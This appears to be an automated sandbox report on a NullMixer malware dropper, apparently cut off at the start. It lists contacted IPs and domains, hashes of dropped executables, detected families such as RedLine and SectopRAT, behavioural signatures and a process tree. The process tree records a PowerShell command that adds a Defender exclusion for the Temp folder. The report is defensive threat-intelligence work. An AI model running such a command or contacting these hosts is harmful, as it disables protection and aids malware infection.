| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| DE | 2.23.176.163:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| DE | 2.23.181.156:80 | www.microsoft.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| LV | 45.142.215.47:27643 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| FR | 51.178.186.149:80 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\setup_install.exe
| MD5 | 2d62b8cf0d215971e12220d96a099e81 |
| SHA1 | 72e43b82e9510321dbb5130d35d09acd850c7ad8 |
| SHA256 | bec993083a69304244f13e191173e31d23c634567ab21484258195086112aa40 |
| SHA512 | e0763f93143060599658b64cc3c0fa8e8be62c4af2567ab08868492546f200bb5a91b367d2eea296b0a6d71c39a0f0000d71a66aabc1d36664d01dedbfbc5f59 |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
memory/2584-50-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
\Users\Admin\AppData\Local\Temp\7zS49891AC6\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2584-53-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/2584-66-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2584-64-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2584-65-0x000000006494A000-0x000000006494F000-memory.dmp
memory/2584-63-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2584-62-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2584-61-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2584-72-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2584-71-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2584-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2584-69-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2584-68-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2584-67-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2584-75-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2584-77-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2584-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2584-76-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2584-73-0x0000000000400000-0x000000000051C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07be2debb1a.exe
| MD5 | 7908fc00709580c4e12534bcd7ef8aae |
| SHA1 | 616616595f65c8fdaf1c5f24a4569e6af04e898f |
| SHA256 | 55fc7e624b75a66d04ed1dfc8d6957ceb013db94e9be29e779280378011d1399 |
| SHA512 | 0d5a72410d628d3bf6ff9188a69f378e04184ed603a620659f4084bd8a5a392577849c5aa895706eec5213b0036d24faafb8e153b458b5f53d8da7ce636b7a00 |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0741b6b6c3.exe
| MD5 | f75e29fdd8803d46736be53a119c0814 |
| SHA1 | e75af0dd2e15043e49684e599bd76f037abbee64 |
| SHA256 | fe9cac8ff86d68feb4e76f8bc04c345e767353feed2a5fe8c98cc9a42b8739af |
| SHA512 | 223587ca8c9974976f07a683607cabf9e6414878121be48a4831ce7b5c2bbde7dcfc3dd6454999c135952fddc307d99b47c008a5417d3ab91b58775a6dc92b12 |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0752b359bd184a.exe
| MD5 | aee0df0b273236965ad033c9a4be275f |
| SHA1 | ac8124f037441434c9881a2649e2e62bf276b1a6 |
| SHA256 | 622752355b43c5c019c6242b40c93288006b61fea2039d467bff1ac9c7e4dd85 |
| SHA512 | 759013680b6019d2783aabc1313bd949c564b7a8ecd267b626a9011963c0622dccfe3853f30df3c5d4434683adcf08372305abfae974692ed5cbc2d55842567f |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07fcb30681127.exe
| MD5 | 4a01f3a6efccd47150a97d7490fd8628 |
| SHA1 | 284af830ac0e558607a6a34cf6e4f6edc263aee1 |
| SHA256 | e29476ee4544a426c1518728034242be3e6821f79378ae2faffedecc194c5a97 |
| SHA512 | 4d0e886e3227f09c177f1a9836ee65766aafc7f48458c944da1afc061106dfbbf47455e54065d22de955b44044817ac900ee9ac80b434ad73bf53262acb49519 |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun075246a0bffeab.exe
| MD5 | 118cf2a718ebcf02996fa9ec92966386 |
| SHA1 | f0214ecdcb536fe5cce74f405a698c1f8b2f2325 |
| SHA256 | 7047db11a44cfcd1965dcf6ac77d650f5bb9c4282bf9642614634b09f3dd003d |
| SHA512 | fe5355b6177f81149013c444c244e540d04fbb2bcd2bf3bb3ea9e8c8152c662d667a968a35b24d1310decb1a2db9ac28157cda85e2ef69efee1c9152b0f39089 |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0750d1e499.exe
| MD5 | 725101e70fc2007633fca44a6129d46c |
| SHA1 | cd4806d4b7889bf86e80b60e207fd78b32c8c841 |
| SHA256 | 7d7b882da2072450c3924d2b0cbc22e74d4155e8db6a9a14d4932ca5dadf8967 |
| SHA512 | 72c23216429adb6ee0ac52224ace136acedb5f7d4af9dac2bb557cda1843e5239480b97e4be86abc9654e8a273a3f69af36c7dd0500efd247ab3b0b678e7194d |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07cad998fb20a18.exe
| MD5 | 7c6b2dc2c253c2a6a3708605737aa9ae |
| SHA1 | cf4284f29f740b4925fb2902f7c3f234a5744718 |
| SHA256 | b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba |
| SHA512 | 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07 |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun0794d0eebce1.exe
| MD5 | 0f1ef1bad121bd626d293df70f9c73f8 |
| SHA1 | 790d44990c576d1da37e535a447dc6b7270b4ca2 |
| SHA256 | 327e9994d62d8a1042f96db61359c9258ebc9c703f9a536801da79b196c221d3 |
| SHA512 | b626ccadfd53383a1f18d4604b4adac6ac5a0bd010089be26dd026e4a44f565813cff3711cc9343c9112a6cbcdcff208d209fba9e94f1103746e50af83be171b |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07dc9d2dae027.exe
| MD5 | 69f0fe993f6e63c9e7a2b739ec956e82 |
| SHA1 | 6f9a1b7a9fceac26722da17e204f57a47d7b66a5 |
| SHA256 | ee4355899a94ed5b369d8a8851d52ef2286c01af577e70bc82f43a5f4716fb0b |
| SHA512 | 1f81e0b8c3a5748a2aa47e02f8b1c1fc09e8d81871a607a148343ac3c579b82685f41eddf2070976a31aabccef0e70303c05d30e0c78c287a5c478c886185b1a |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07778dd9fc6d53.exe
| MD5 | ecc773623762e2e326d7683a9758491b |
| SHA1 | ad186c867976dc5909843418853d54d4065c24ba |
| SHA256 | 8f97a40b4d9cf26913ab95eec548d75a8dad5a1a24d992d047e080070282d838 |
| SHA512 | 40e30981f533b19123ec3d84276a28acd282c01907398ca6d67155901cfaf2c2d6355dc708d0ecfc6c21b5c671b4c3bb87eeb53183b7085474a2acd302f038a4 |
C:\Users\Admin\AppData\Local\Temp\7zS49891AC6\Sun07e3a022a8656c5ca.exe
| MD5 | b7ed5241d23ac01a2e531791d5130ca2 |
| SHA1 | 49df6413239d15e9464ed4d0d62e3d62064a45e9 |
| SHA256 | 98ac9097e514852804ca276aac3a319b07acf7219aef34e0d4fff6ea5b094436 |
| SHA512 | 1e4402c695a848bd62f172bd91eb3a4df8067c1fbc5f95dfd601d7a8c24ad81ac2e1f2e1280160087da8c8fbb72e957259661d759d8f7d9317cef3c64429a126 |
memory/2136-143-0x0000000000130000-0x0000000000138000-memory.dmp
memory/1096-142-0x0000000000340000-0x0000000000356000-memory.dmp
memory/2124-144-0x0000000000B00000-0x0000000000B72000-memory.dmp
memory/2116-145-0x0000000001D00000-0x0000000001D24000-memory.dmp
memory/1096-146-0x00000000002D0000-0x00000000002D6000-memory.dmp
memory/2116-151-0x0000000001D30000-0x0000000001D52000-memory.dmp
memory/2264-177-0x0000000000E30000-0x0000000000F7C000-memory.dmp
memory/2584-200-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2584-199-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2584-198-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2584-197-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2584-195-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2584-186-0x0000000000400000-0x000000000051C000-memory.dmp
memory/2704-191-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2704-189-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2704-188-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2704-187-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2704-184-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2704-182-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2704-180-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2704-178-0x0000000000400000-0x0000000000422000-memory.dmp
memory/236-204-0x0000000000400000-0x00000000016C7000-memory.dmp
memory/2116-207-0x0000000000400000-0x00000000016E0000-memory.dmp
memory/3048-206-0x0000000000400000-0x00000000016E0000-memory.dmp
memory/2264-208-0x0000000000E30000-0x0000000000F7C000-memory.dmp
memory/2264-209-0x0000000002E00000-0x0000000002EA5000-memory.dmp
memory/2264-210-0x0000000000F80000-0x0000000001012000-memory.dmp
memory/2264-213-0x0000000000F80000-0x0000000001012000-memory.dmp
memory/3048-214-0x0000000000400000-0x00000000016E0000-memory.dmp
memory/2264-220-0x0000000000F80000-0x0000000001012000-memory.dmp
memory/2264-221-0x0000000002EB0000-0x0000000003BF1000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-22 09:57
Reported
2024-11-22 09:59
Platform
win10v2004-20241007-en
Max time kernel
124s
Max time network
148s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07cad998fb20a18.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\setup_install.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07be2debb1a.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2836 set thread context of 1580 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0794d0eebce1.exe | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0794d0eebce1.exe |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07cad998fb20a18.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07e3a022a8656c5ca.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0794d0eebce1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun075246a0bffeab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07778dd9fc6d53.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0794d0eebce1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07be2debb1a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0741b6b6c3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0752b359bd184a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0741b6b6c3.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0741b6b6c3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0741b6b6c3.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133767431039015654" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0752b359bd184a.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS884015E7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0741b6b6c3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0752b359bd184a.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07be2debb1a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07e3a022a8656c5ca.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun075246a0bffeab.exe
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0741b6b6c3.exe
Sun0741b6b6c3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07778dd9fc6d53.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07fcb30681127.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07dc9d2dae027.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0750d1e499.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0794d0eebce1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07cad998fb20a18.exe
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun075246a0bffeab.exe
Sun075246a0bffeab.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4820 -ip 4820
